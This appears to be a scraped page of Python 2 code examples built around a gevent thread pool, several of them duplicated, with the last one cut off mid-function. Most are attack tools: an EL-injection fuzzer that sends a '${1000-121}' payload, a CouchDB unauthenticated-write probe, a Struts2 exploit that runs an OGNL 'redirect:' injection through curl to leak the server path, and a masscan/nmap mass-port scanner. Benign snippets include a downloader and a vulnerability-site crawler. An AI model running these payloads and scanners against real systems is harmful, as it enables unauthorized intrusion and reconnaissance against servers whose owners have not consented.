Пример #1
0
class ELExpression():
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []
        self.payload = '{1000-121}'
        self.match = '879'

    def putinqueue(self, info):
        try:

            url = info[0]
            data = info[1]
            current = data if data else url
            for k in re.finditer(r'\=(?P<value>.*?)(?:$|&)', current):
                value = k.group('value')
                payload = current.replace(value, self.payload)
                if data:
                    self.q.append((url, payload))
                else:
                    self.q.append((payload, data))
        except:
            traceback.print_exc()

    def Fuzz(self, info):
        try:
            url = info[0]
            data = info[1]
            if data:
                try:
                    r = requests.post(url, data=data, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
            else:
                try:
                    print "Req ::" + url
                    r = requests.get(url, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
                if self.match in content:
                    msg = 'find vulnerable url'
                    logging.info(msg)
                    self.result.append(info)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.putinqueue(info)
            else:
                with open(info) as f:
                    ud = json.loads(f.read())
                for i in ud:
                    self.putinqueue(i)
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #2
0
class ELExpression():
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []
        self.payload = '${1000-121}'
        self.match = '879'

    def putinqueue(self, info):
        try:

            url = info[0]
            data = info[1]
            current = data if data else url
            for k in re.finditer(r'\=(?P<value>.*?)(?:$|&)', current):
                value = k.group('value')
                payload = current.replace(value, self.payload)
                if data:
                    self.q.append((url, payload))
                else:
                    self.q.append((payload, data))
        except:
            traceback.print_exc()

    def Fuzz(self, info):
        try:
            url = info[0]
            data = info[1]
            if data:
                try:
                    r = requests.post(url, data=data, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
            else:
                try:
                    print "Req ::" + url
                    r = requests.get(url, timeout=10, verify=False)
                    content = r.content
                except:
                    content = ''
                if self.match in content:
                    msg = 'find vulnerable url'
                    logging.info(msg)
                    self.result.append(info)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.putinqueue(info)
            else:
                with open(info) as f:
                    ud = json.loads(f.read())
                for i in ud:
                    self.putinqueue(i)
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #3
0
def easy_parallelize_gevent(f, sequence):
    if not "gevent_pool" in PARALLEL_STRUCTURES:
        from gevent.threadpool import ThreadPool
        pool = ThreadPool(30000)
        PARALLEL_STRUCTURES["gevent_pool"] = pool
    pool = PARALLEL_STRUCTURES["gevent_pool"]
    result = pool.map(f, sequence)
    return result
Пример #4
0
def easy_parallelize_gevent(f, sequence):
    if not "gevent_pool" in PARALLEL_STRUCTURES:
        from gevent.threadpool import ThreadPool
        pool = ThreadPool(30000)
        PARALLEL_STRUCTURES["gevent_pool"] = pool
    pool = PARALLEL_STRUCTURES["gevent_pool"]
    result = pool.map(f, sequence)
    return result
Пример #5
0
class CouchDb():
    def __init__(self):
        self.pool = ThreadPool(10)
        self.result = []
        self.port = "5984"
        self.q = []
        self.randomstrs = ['a', 'k', 'b', 'v', 'd', 'f', 'e', 'g']
        self.path = '_utils/index.html'

    def Fuzz(self, info):
        try:
            url = info[0]
            port = info[1]
            host = urlparse.urlparse(url).netloc
            url = r'http://' + host + ":" + port
            rstr = "".join(random.sample(self.randomstrs, 5))
            url = url + r'/' + rstr
            try:
                print "Req::" + url
                r = requests.put(url, timeout=10)
                if 'ok' and 'true' in r.content:
                    self.result.append(info)
            except:
                pass
        except:
            pass

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.q.append(info)
            else:
                with open(file) as f:
                    content = json.loads(f.read())
                    for i in content:
                        self.q.append((i['url'], self.port))
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #6
0
class CouchDb():
    def __init__(self):
        self.pool = ThreadPool(10)
        self.result = []
        self.port = "5984"
        self.q = []
        self.randomstrs = ['a', 'k', 'b', 'v', 'd', 'f', 'e', 'g']
        self.path = '_utils/index.html'

    def Fuzz(self, info):
        try:
            url = info[0]
            port = info[1]
            host = urlparse.urlparse(url).netloc
            url = r'http://' + host + ":" + port
            rstr = "".join(random.sample(self.randomstrs, 5))
            url = url + r'/' + rstr
            try:
                print "Req::" + url
                r = requests.put(url, timeout=10)
                if 'ok' and 'true' in r.content:
                    self.result.append(info)
            except:
                pass
        except:
            pass

    def Scan(self, info):
        try:
            if isinstance(info, tuple):
                self.q.append(info)
            else:
                with open(file) as f:
                    content = json.loads(f.read())
                    for i in content:
                        self.q.append((i['url'], self.port))
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #7
0
class st2bypass():
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []

    def action(self, info):
        try:
            if '.do' or '.action' in info:
                url = info.split('?')[0]
                self.q.append(url)
        except:
            traceback.print_exc()

    def Fuzz(self, url):
        try:
            cmd = '''curl -i "%s" -F 'redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}=-1' ''' % url
            print cmd
            output = os.popen(cmd).read()
            for i in re.finditer(r'\:\/\/.*\/\/(?P<path>'
                                 r'.*?)/;', output):
                path = i.group('path')
                if path:
                    self.result.append(path)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, str):
                self.action(info)
            else:
                for i in info:
                    self.action(i['url'])
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #8
0
class st2bypass():
    def __init__(self):
        self.result = []
        self.pool = ThreadPool(10)
        self.q = []

    def action(self, info):
        try:
            if '.do' or '.action' in info:
                url = info.split('?')[0]
                self.q.append(url)
        except:
            traceback.print_exc()

    def Fuzz(self, url):
        try:
            cmd = '''curl -i "%s" -F 'redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}=-1' ''' % url
            print cmd
            output = os.popen(cmd).read()
            for i in re.finditer(r'\:\/\/.*\/\/(?P<path>' r'.*?)/;', output):
                path = i.group('path')
                if path:
                    self.result.append(path)
        except:
            traceback.print_exc()

    def Scan(self, info):
        try:
            if isinstance(info, str):
                self.action(info)
            else:
                for i in info:
                    self.action(i['url'])
            self.pool.map(self.Fuzz, self.q)
        except:
            traceback.print_exc()
Пример #9
0
class Scanner(object):
    def __init__(self, filename='ips.txt'):
        self.W = '\033[0m'
        self.G = '\033[1;32m'
        self.O = '\033[1;33m'
        self.R = '\033[1;31m'
        self.time = time()
        self.result = []
        self.ips = filename
        self.pool = ThreadPool(30)
        self.output_mode = "silent"  # debug or silent
        self.masscan_ports_max = 500
        self.masscan_ports = '0-65535'
        self.masscan_rate = 1000
        self.default_policy = '-P0 -sS -sV -O -Pn  --open --script=banner --script-timeout=7200 -script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36"'
        self.nmap_timeout = 3600
        self.headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
        }
        self.patterns = (
            '<meta[\s]*http-equiv[\s]*=[\s]*[\'"]refresh[\'"][\s]*content[\s]*=[\s]*[\'"]\d+[\s]*;[\s]*url[\s]*=[\s]*(.*?)[\'"][\s]*/?>',
            'window.location[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;',
            'window.location.href[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;',
            'window.location.replace[\s]*\([\'"](.*?)[\'"]\)[\s]*;',
            'window.navigate[\s]*\([\'"](.*?)[\'"]\)',
            'location.href[\s]*=[\s]*[\'"](.*?)[\'"]',
        )
        self.default_top1000 = [
            1, 3, 4, 6, 7, 9, 11, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30,
            32, 33, 37, 42, 43, 49, 53, 67, 69, 70, 79, 80, 81, 82, 83, 84, 85,
            88, 89, 90, 99, 100, 102, 104, 106, 109, 110, 111, 113, 119, 123,
            125, 135, 137, 138, 139, 143, 144, 146, 161, 162, 163, 175, 179,
            199, 211, 212, 222, 254, 255, 256, 259, 264, 280, 301, 306, 311,
            340, 366, 389, 391, 406, 407, 416, 417, 425, 427, 443, 444, 445,
            459, 464, 465, 481, 497, 500, 502, 503, 512, 513, 514, 515, 520,
            523, 524, 541, 543, 544, 545, 548, 554, 555, 563, 564, 587, 593,
            616, 617, 623, 625, 626, 631, 636, 646, 648, 666, 667, 668, 683,
            687, 691, 700, 705, 711, 714, 720, 722, 726, 749, 765, 771, 777,
            783, 787, 789, 800, 801, 808, 843, 873, 880, 888, 898, 900, 901,
            902, 903, 911, 912, 981, 987, 990, 992, 993, 995, 999, 1000, 1001,
            1002, 1007, 1009, 1010, 1011, 1021, 1022, 1023, 1024, 1025, 1026,
            1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037,
            1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048,
            1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059,
            1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070,
            1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081,
            1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092,
            1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1102, 1104, 1105,
            1106, 1107, 1108, 1110, 1111, 1112, 1113, 1114, 1117, 1119, 1121,
            1122, 1123, 1124, 1126, 1130, 1131, 1132, 1137, 1138, 1141, 1145,
            1147, 1148, 1149, 1151, 1152, 1154, 1163, 1164, 1165, 1166, 1169,
            1174, 1175, 1177, 1183, 1185, 1186, 1187, 1192, 1194, 1198, 1199,
            1200, 1201, 1213, 1216, 1217, 1218, 1233, 1234, 1236, 1241, 1244,
            1247, 1248, 1259, 1260, 1271, 1272, 1277, 1287, 1296, 1300, 1301,
            1309, 1310, 1311, 1322, 1328, 1334, 1344, 1352, 1417, 1433, 1434,
            1443, 1455, 1461, 1471, 1494, 1500, 1501, 1503, 1521, 1524, 1533,
            1556, 1580, 1583, 1594, 1600, 1604, 1641, 1645, 1658, 1666, 1687,
            1688, 1700, 1701, 1717, 1718, 1719, 1720, 1721, 1723, 1755, 1761,
            1782, 1783, 1801, 1805, 1812, 1839, 1840, 1862, 1863, 1864, 1875,
            1883, 1900, 1911, 1914, 1935, 1947, 1962, 1967, 1971, 1972, 1974,
            1984, 1991, 1993, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
            2006, 2007, 2008, 2009, 2010, 2013, 2020, 2021, 2022, 2030, 2033,
            2034, 2035, 2038, 2040, 2041, 2042, 2043, 2045, 2046, 2047, 2048,
            2049, 2065, 2068, 2080, 2082, 2083, 2086, 2087, 2094, 2099, 2100,
            2103, 2105, 2106, 2107, 2111, 2119, 2121, 2123, 2126, 2135, 2144,
            2152, 2160, 2161, 2170, 2179, 2181, 2190, 2191, 2196, 2200, 2222,
            2251, 2260, 2288, 2301, 2323, 2332, 2366, 2375, 2376, 2379, 2381,
            2382, 2383, 2393, 2394, 2399, 2401, 2404, 2424, 2425, 2427, 2455,
            2480, 2492, 2500, 2501, 2522, 2525, 2557, 2601, 2602, 2604, 2605,
            2607, 2608, 2628, 2638, 2701, 2702, 2710, 2717, 2718, 2725, 2800,
            2809, 2811, 2869, 2875, 2909, 2910, 2920, 2967, 2968, 2998, 3000,
            3001, 3003, 3005, 3006, 3007, 3011, 3013, 3017, 3030, 3031, 3050,
            3052, 3071, 3077, 3128, 3168, 3211, 3221, 3260, 3261, 3268, 3269,
            3283, 3288, 3299, 3300, 3301, 3306, 3307, 3310, 3322, 3323, 3324,
            3325, 3333, 3351, 3367, 3369, 3370, 3371, 3372, 3388, 3389, 3390,
            3404, 3460, 3476, 3493, 3517, 3527, 3541, 3542, 3546, 3551, 3580,
            3659, 3671, 3689, 3690, 3702, 3703, 3737, 3749, 3766, 3780, 3784,
            3800, 3801, 3809, 3814, 3826, 3827, 3828, 3851, 3869, 3871, 3878,
            3880, 3889, 3905, 3914, 3918, 3920, 3945, 3971, 3986, 3995, 3998,
            4000, 4001, 4002, 4003, 4004, 4005, 4006, 4022, 4040, 4045, 4063,
            4064, 4070, 4111, 4125, 4126, 4129, 4224, 4242, 4279, 4321, 4343,
            4369, 4433, 4443, 4444, 4445, 4446, 4449, 4550, 4567, 4662, 4712,
            4730, 4786, 4800, 4840, 4848, 4880, 4899, 4900, 4911, 4949, 4998,
            5000, 5001, 5002, 5003, 5004, 5006, 5007, 5009, 5030, 5033, 5050,
            5051, 5054, 5060, 5061, 5080, 5087, 5093, 5094, 5100, 5101, 5102,
            5120, 5190, 5200, 5214, 5221, 5222, 5225, 5226, 5269, 5280, 5298,
            5351, 5353, 5357, 5400, 5405, 5414, 5431, 5432, 5433, 5440, 5500,
            5510, 5544, 5550, 5554, 5555, 5560, 5566, 5577, 5601, 5631, 5632,
            5633, 5666, 5672, 5678, 5679, 5683, 5718, 5730, 5800, 5801, 5802,
            5810, 5811, 5815, 5822, 5825, 5850, 5859, 5862, 5877, 5900, 5901,
            5902, 5903, 5904, 5906, 5907, 5910, 5911, 5915, 5922, 5925, 5938,
            5950, 5952, 5959, 5960, 5961, 5962, 5963, 5984, 5985, 5986, 5987,
            5988, 5989, 5998, 5999, 6000, 6001, 6002, 6003, 6004, 6005, 6007,
            6009, 6025, 6059, 6082, 6100, 6101, 6106, 6112, 6123, 6129, 6156,
            6346, 6379, 6389, 6488, 6502, 6510, 6543, 6547, 6565, 6566, 6567,
            6580, 6646, 6664, 6665, 6666, 6667, 6668, 6669, 6689, 6692, 6699,
            6779, 6788, 6789, 6792, 6839, 6881, 6901, 6969, 7000, 7001, 7002,
            7004, 7007, 7019, 7025, 7070, 7071, 7077, 7100, 7103, 7106, 7200,
            7201, 7288, 7402, 7435, 7443, 7474, 7496, 7512, 7547, 7548, 7625,
            7627, 7634, 7676, 7741, 7777, 7778, 7779, 7800, 7911, 7920, 7921,
            7937, 7938, 7999, 8000, 8001, 8002, 8007, 8008, 8009, 8010, 8011,
            8021, 8022, 8023, 8031, 8042, 8045, 8060, 8069, 8080, 8081, 8082,
            8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8093, 8098, 8099,
            8100, 8112, 8125, 8126, 8139, 8161, 8180, 8181, 8192, 8193, 8194,
            8200, 8222, 8254, 8290, 8291, 8292, 8300, 8333, 8334, 8377, 8378,
            8383, 8400, 8402, 8443, 8471, 8500, 8545, 8554, 8600, 8649, 8651,
            8652, 8654, 8686, 8701, 8800, 8834, 8873, 8880, 8883, 8888, 8889,
            8899, 8994, 9000, 9001, 9002, 9003, 9009, 9010, 9011, 9040, 9042,
            9050, 9051, 9071, 9080, 9081, 9090, 9091, 9099, 9100, 9101, 9102,
            9103, 9110, 9111, 9151, 9160, 9191, 9200, 9207, 9220, 9290, 9300,
            9333, 9415, 9418, 9443, 9471, 9485, 9500, 9502, 9503, 9535, 9575,
            9593, 9594, 9595, 9600, 9618, 9653, 9666, 9700, 9711, 9876, 9877,
            9878, 9898, 9900, 9917, 9929, 9943, 9944, 9968, 9981, 9998, 9999,
            10000, 10001, 10002, 10003, 10004, 10009, 10010, 10012, 10024,
            10025, 10082, 10162, 10180, 10215, 10243, 10333, 10566, 10616,
            10617, 10621, 10626, 10628, 10629, 10778, 11001, 11110, 11111,
            11211, 11300, 11310, 11967, 12000, 12174, 12265, 12345, 13456,
            13579, 13722, 13782, 13783, 14000, 14147, 14238, 14265, 14441,
            14442, 15000, 15002, 15003, 15004, 15660, 15672, 15742, 16000,
            16001, 16010, 16012, 16016, 16018, 16080, 16113, 16992, 16993,
            17185, 17877, 17988, 18001, 18040, 18081, 18101, 18245, 18988,
            19101, 19283, 19315, 19350, 19780, 19801, 19842, 19888, 20000,
            20005, 20031, 20221, 20222, 20547, 20828, 21571, 22105, 22222,
            22939, 23023, 23424, 23502, 24444, 24800, 25105, 25565, 25734,
            25735, 26214, 27000, 27015, 27017, 27019, 27080, 27352, 27353,
            27355, 27356, 27715, 28017, 28201, 28784, 30000, 30310, 30311,
            30312, 30313, 30718, 30951, 31038, 31337, 32400, 32768, 32769,
            32770, 32771, 32772, 32773, 32774, 32775, 32776, 32777, 32778,
            32779, 32780, 32781, 32782, 32783, 32784, 32785, 33338, 33354,
            33899, 34571, 34572, 34573, 34962, 34964, 35500, 37777, 38292,
            40193, 40911, 41511, 42510, 44176, 44442, 44443, 44501, 44818,
            45100, 45554, 47808, 48080, 48899, 49151, 49152, 49153, 49154,
            49155, 49156, 49157, 49158, 49159, 49160, 49161, 49163, 49165,
            49167, 49175, 49176, 49400, 49999, 50000, 50001, 50002, 50003,
            50006, 50050, 50070, 50090, 50100, 50300, 50389, 50500, 50636,
            50800, 51103, 51106, 51493, 52673, 52822, 52848, 52869, 54045,
            54328, 55055, 55056, 55553, 55555, 55600, 56737, 56738, 57294,
            57797, 58080, 59110, 60020, 60443, 61532, 61613, 61616, 61900,
            62078, 63331, 64623, 64680, 64738, 65000, 65129, 65389
        ]

    def targetsByFile(self):
        targets = []
        try:
            with open(self.ips) as fr:
                for ip in fr.readlines():
                    targets.append(ip.strip())
        except Exception as e:
            print self.R + u'\n[x] file does not exist...' + self.W
        return targets

    def scanByMasscan(self, target):
        report_dict = defaultdict(list)
        tmp_file = '{}.xml'.format(uuid.uuid4())
        try:
            cmd = 'masscan {} -p {} -oX {} --rate {} --wait 1 >> /dev/null 2>&1'.format(target, self.masscan_ports,
                                                                                        tmp_file, self.masscan_rate) \
                if self.output_mode == "silent" else 'masscan {} -p {} -oX {} --rate {} --wait 1'.format(
                target, self.masscan_ports, tmp_file, self.masscan_rate)
            os.system(cmd)
            if os.path.exists(tmp_file) and os.path.getsize(tmp_file):
                report = NmapParser.parse_fromfile(tmp_file)
                for host in report.hosts:
                    for service in host.services:
                        report_dict[host.ipv4].append(service.port)
        except Exception as e:
            print e
        finally:
            if os.path.exists(tmp_file):
                os.remove(tmp_file)
            return report_dict

    def scanByNmap(self, target, policy):
        runtime = 0
        try:
            nmap_proc = NmapProcess(targets=target,
                                    options=policy,
                                    safe_mode=True)
            nmap_proc.run_background()
            while nmap_proc.is_running():
                if runtime >= self.nmap_timeout:
                    nmap_proc.stop()
                    if self.output_mode != "silent":
                        print self.R + u'\n[x] scan_host {} timeout...'.format(
                            target) + self.W
                    break
                else:
                    if self.output_mode != "silent":
                        sys.stdout.write(
                            u'\033[1;34m[~] scan_host is {},scan progress is {}%({} sec)\n\033[0m'
                            .format(target, nmap_proc.progress, runtime))
                        sys.stdout.flush()
                    sleep(5)
                    runtime += 5
            if nmap_proc.is_successful() and nmap_proc.stdout:
                self.parserReport(nmap_proc.stdout)
        except Exception as e:
            print e

    def parserTitle(self, url):
        def html_decoder(html_entries):
            try:
                hp = HTMLParser.HTMLParser()
                return hp.unescape(html_entries)
            except:
                return html_entries

        def match_title(content):
            title = re.findall("document\.title[\s]*=[\s]*['\"](.*?)['\"]",
                               content, re.I | re.M | re.S)
            if title and len(title) >= 1:
                return title[0]
            else:
                title = re.findall('<title.*?>(.*?)</title>', content,
                                   re.I | re.M | re.S)
                if title and len(title) >= 1:
                    return title[0]
                else:
                    return ""

        def page_decode(html_content):
            raw_content = html_content
            try:
                html_content = raw_content.decode('utf-8')
            except UnicodeError:
                try:
                    html_content = raw_content.decode('gbk')
                except UnicodeError:
                    try:
                        html_content = raw_content.decode('gb2312')
                    except UnicodeError:
                        try:
                            html_content = raw_content.decode('big5')
                        except:
                            pass
            return html_content

        html_content = ''
        title = ''
        if '://' not in url:
            url = 'http://' + url.strip()
        url = url.rstrip('/') + '/'
        try:
            try:
                s = requests.Session()
                s.mount('http://', HTTPAdapter(max_retries=1))
                s.mount('https://', HTTPAdapter(max_retries=1))
                req = s.get(url,
                            headers=self.headers,
                            verify=False,
                            allow_redirects=True,
                            timeout=15)
                html_content = req.content
                html_content = page_decode(html_content)
                req.close()
            except:
                pass
            title = match_title(html_content) if html_content else ''
            try:
                if title:
                    if re.findall('\$#\d{3,};', title):
                        title = html_decoder(title)
            except:
                pass
            for pattern in self.patterns:
                jump = re.findall(pattern, html_content, re.I | re.M)
                if len(jump) == 1:
                    if "://" in jump[0]:
                        url = jump[0]
                    else:
                        url += jump[0]
                    break
            try:
                s = requests.Session()
                s.mount('http://', HTTPAdapter(max_retries=1))
                s.mount('https://', HTTPAdapter(max_retries=1))
                req = s.get(url,
                            headers=self.headers,
                            verify=False,
                            timeout=15)
                html_content = req.content
                req.close()
            except:
                pass
            html_content = page_decode(html_content)
            title = match_title(html_content) if html_content else ""
            try:
                if title:
                    if re.findall("[$#]\d{3,};", title):
                        title = html_decoder(title)
            except:
                pass
        except:
            pass
        finally:
            if title and len(title) > 255:
                title = title[:250]
            return title

    def parserReport(self, report):
        try:
            parsed = NmapParser.parse(report)
            for host in parsed.hosts:
                for services in host.services:
                    if ("http" in services.service) or ("ssl"
                                                        in services.service):
                        url = "https://" + host.ipv4 + ":" + str(
                            services.port) if ('ssl' in services.service) or (
                                'https' in services.service
                            ) else "http://" + host.ipv4 + ":" + str(
                                services.port)
                        title = self.parserTitle(url)
                        self.result.append(
                            (host.ipv4, services.port, services.protocol,
                             services.state, services.service, services.banner,
                             title))
                        print u'{}[+] scan_host is {},scan result is {}|{}|{}|{}|{}|{}{}'.format(
                            self.G, host.ipv4, services.port,
                            services.protocol, services.state,
                            services.service, services.banner, title, self.W)
        except Exception as e:
            print e

    def scanMasscanToNmap(self, target):
        try:
            ip_port_list = self.scanByMasscan(target)
            if ip_port_list:
                for target, ports in ip_port_list.items():
                    if len(ports) < self.masscan_ports_max:
                        policy = self.default_policy + " -p {}".format(
                            ','.join(
                                map(str, list(
                                    set(self.default_top1000 + ports)))))
                        self.scanByNmap(str(target), policy)
                    else:
                        if self.output_mode != "silent":
                            print self.R + u'\n[x] scan_host {} maybe honeypot or network reasons...'.format(
                                target) + self.W
            else:
                if self.output_mode != "silent":
                    print self.R + u'\n[x] scan_host {} not found live ports...'.format(
                        target) + self.W
        except Exception as e:
            print e

    def main(self):
        try:
            print '\033[1;37m[*] Console starting({} mode), please wait...\033[0m'.format(
                self.output_mode)
            self.pool.map(self.scanMasscanToNmap, self.targetsByFile())
            self.pool.join()
            if self.result:
                csvfile = file('result.csv', 'wb')
                csvfile.write(u'\ufeff'.encode('utf8'))
                writer = csv.writer(csvfile)
                writer.writerow([
                    'Address', 'Port', 'Protocol', 'State', 'Service',
                    'Banner', 'Title'
                ])
                writer.writerows(self.result)
                csvfile.close()
            print u'{}[✓] scan completion time : {} sec.{}'.format(
                self.O,
                time() - self.time, self.W)
        except Exception as e:
            print e
        except KeyboardInterrupt:
            print self.R + u'\n[x]  user Ctrl+C aborts scan ...' + self.W
            sys.exit(1)
Пример #10
0
def download(url,
             output,
             thread_count=defaults['thread_count'],
             buffer_size=defaults['buffer_size'],
             block_size=defaults['block_size']):
    # get latest file info
    file_info = get_file_info(url)

    # init path
    if output is None:
        output = file_info.name
    workpath = '%s.ing' % output
    infopath = '%s.inf' % output

    # split file to blocks. every block is a array [start, offset, end],
    # then each greenlet download filepart according to a block, and
    # update the block' offset.
    blocks = []

    if os.path.exists(infopath):
        # load blocks
        _x, blocks = read_data(infopath)
        if (_x.url != url or _x.name != file_info.name
                or _x.lastmodified != file_info.lastmodified):
            blocks = []

    if len(blocks) == 0:
        # set blocks
        if block_size > file_info.size:
            blocks = [[0, 0, file_info.size]]
        else:
            block_count, remain = divmod(file_info.size, block_size)
            blocks = [[
                i * block_size, i * block_size, (i + 1) * block_size - 1
            ] for i in range(block_count)]
            blocks[-1][-1] += remain
        # create new blank workpath
        with open(workpath, 'wb') as fobj:
            fobj.write('')

    # start monitor
    monitor = gevent.spawn(_monitor, infopath, file_info, blocks)

    # start downloading
    with open(workpath, 'rb+') as fobj:
        args = [(url, blocks[i], fobj, buffer_size) for i in range(len(blocks))
                if blocks[i][1] < blocks[i][2]]

        if thread_count > len(args):
            thread_count = len(args)

        pool = ThreadPool(thread_count)
        pool.map(_worker, args)
        pool.join()

    monitor.join()

    # rename workpath to output
    if os.path.exists(output):
        os.remove(output)
    os.rename(workpath, output)

    # delete infopath
    if os.path.exists(infopath):
        os.remove(infopath)

    print 'thread_count ', thread_count
Пример #11
0
class Cloud:
    def __init__(self):
        self.pool = ThreadPool(POOL_THREADS)
        self.bugs = []
        self.have_content = True
        pass

    def get_one_page(self, page_id):
        print('[*] Crawl Page: {0}'.format(str(page_id)))
        page_url = WOOYUN_CONFIRM + str(page_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] Page: {0} Get Error: {1}'.format(
                    str(page_id), str(e)))
        self.analyse_content(req.text)

    def analyse_content(self, content):
        try:
            reg_pattern = '<tr>\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s'
            tmp = re.findall(reg_pattern, content)
            if len(tmp) <= 1:
                self.have_content = False
                return
            for tmp_one in tmp:
                # print(tmp_one)
                bug_info = {}
                reg_pattern = '<th>(.*?)</th>'
                bug_date = re.findall(reg_pattern, tmp_one[1])
                if len(bug_date) > 0:
                    bug_info['date'] = bug_date[0]
                    reg_pattern = '<a href="/bugs/(.*?)">(.*?)</a>'
                    bug_info_tmp = re.findall(reg_pattern, tmp_one[2])
                    bug_info_tmp = bug_info_tmp[0]
                    bug_info['id'] = bug_info_tmp[0]
                    bug_info['name'] = bug_info_tmp[1]
                    self.get_bug_detail(bug_info_tmp[0], bug_info)
                    self.bugs.append(bug_info)
        except Exception as e:
            print('[-] Analyse Error! Detail: {0}'.format(str(e)))

    @staticmethod
    def get_bug_detail(bug_id, bug_info):
        page_url = WOOYUN_BUG_DETAIL + str(bug_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] BUG: {0} Get Error: {1}'.format(
                    str(bug_id), str(e)))
        content = req.text
        reg_pattern = '<p class="detail">漏洞Rank:(.*?)</p>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['rank'] = bug_info_tmp[0].strip()
        reg_pattern = '<h3 class=\'wybug_corp\'>相关厂商:(.*)\s(.*?)</a>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['corp'] = bug_info_tmp[0][0].strip(
        ) + bug_info_tmp[0][1].strip()

    def start(self):
        i_count = 1
        while self.have_content:
            self.pool.map(self.get_one_page,
                          [x for x in range(i_count, i_count + 50)])
            gevent.wait()
            i_count += 50
        print(self.bugs)
        file_handle = open('wy_no_1.csv', 'w')
        file_handle.write('bug_id, rank, name, corp, date\n')
        for one_bug in self.bugs:
            file_handle.write('{0}, {1}, {2}, {3}, {4}\n'.format(
                one_bug['id'], one_bug['rank'], one_bug['name'],
                one_bug['corp'], one_bug['date']))
            print(one_bug)
        file_handle.close()
Пример #12
0
def download(url, output, 
        thread_count = defaults['thread_count'], 
        buffer_size = defaults['buffer_size'], 
        block_size = defaults['block_size']):
    # get latest file info
    file_info = get_file_info(url)

    # init path
    if output is None:
        output = file_info.name
    workpath = '%s.ing' % output
    infopath = '%s.inf' % output

    # split file to blocks. every block is a array [start, offset, end],
    # then each greenlet download filepart according to a block, and 
    # update the block' offset.
    blocks = []

    if os.path.exists(infopath):
        # load blocks
        _x, blocks = read_data(infopath)        
        if (_x.url != url or 
                _x.name != file_info.name or 
                _x.lastmodified != file_info.lastmodified):
            blocks = []

    if len(blocks) == 0:
        # set blocks
        if block_size > file_info.size:
            blocks = [[0, 0, file_info.size]]
        else:
            block_count, remain = divmod(file_info.size, block_size)
            blocks = [[i*block_size, i*block_size, (i+1)*block_size-1] for i in range(block_count)]
            blocks[-1][-1] += remain
        # create new blank workpath
        with open(workpath, 'wb') as fobj:
            fobj.write('')

    # start monitor
    monitor = gevent.spawn(_monitor, infopath, file_info, blocks)
    
    # start downloading
    with open(workpath, 'rb+') as fobj:
        args = [(url, blocks[i], fobj, buffer_size) for i in range(len(blocks)) if blocks[i][1] < blocks[i][2]]

        if thread_count > len(args):
            thread_count = len(args)

        pool = ThreadPool(thread_count)
        pool.map(_worker, args)
        pool.join()

    monitor.join()

    # rename workpath to output
    if os.path.exists(output):
        os.remove(output)
    os.rename(workpath, output)

    # delete infopath
    if os.path.exists(infopath):
        os.remove(infopath)

    print 'thread_count ', thread_count
Пример #13
0
class Cloud:
    def __init__(self):
        self.pool = ThreadPool(POOL_THREADS)
        self.bugs = []
        self.have_content = True
        pass

    def get_one_page(self, page_id):
        print('[*] Crawl Page: {0}'.format(str(page_id)))
        page_url = WOOYUN_CONFIRM + str(page_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] Page: {0} Get Error: {1}'.format(str(page_id), str(e)))
        self.analyse_content(req.text)

    def analyse_content(self, content):
        try:
            reg_pattern = '<tr>\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s'
            tmp = re.findall(reg_pattern, content)
            if len(tmp) <= 1:
                self.have_content = False
                return
            for tmp_one in tmp:
                # print(tmp_one)
                bug_info = {}
                reg_pattern = '<th>(.*?)</th>'
                bug_date = re.findall(reg_pattern, tmp_one[1])
                if len(bug_date) > 0:
                    bug_info['date'] = bug_date[0]
                    reg_pattern = '<a href="/bugs/(.*?)">(.*?)</a>'
                    bug_info_tmp = re.findall(reg_pattern, tmp_one[2])
